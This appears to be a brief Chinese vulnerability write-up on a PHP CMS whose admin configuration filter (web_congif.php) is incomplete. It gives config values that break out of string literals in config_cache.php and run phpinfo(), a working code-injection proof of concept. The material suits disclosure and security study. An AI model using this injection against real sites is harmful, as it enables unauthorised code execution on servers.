漏洞作者: 蓝蓝
admin/web_congif.php 的过滤代码如下。
[php]
//强制去掉 '
//强制去掉最后一位 /
$vartmp = str_replace("'",'',$row['varvalue']);
if(substr($vartmp, -1) == '//')
{
$vartmp = substr($vartmp,1,-1);
}
[/php]
只过滤了最后一位的反斜杠,只需要加两个反斜杠就可以了·····
首先修改网站配置信息
config_cache.php中会变成这样
[php]
$cfg_webname = '的网站/';
$cfg_weburl = ';/*http://127.0.0.1';
$cfg_webpath = '*/phpinfo();#';
$cfg_author = '';
[/php]
php代码就会被执行了。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论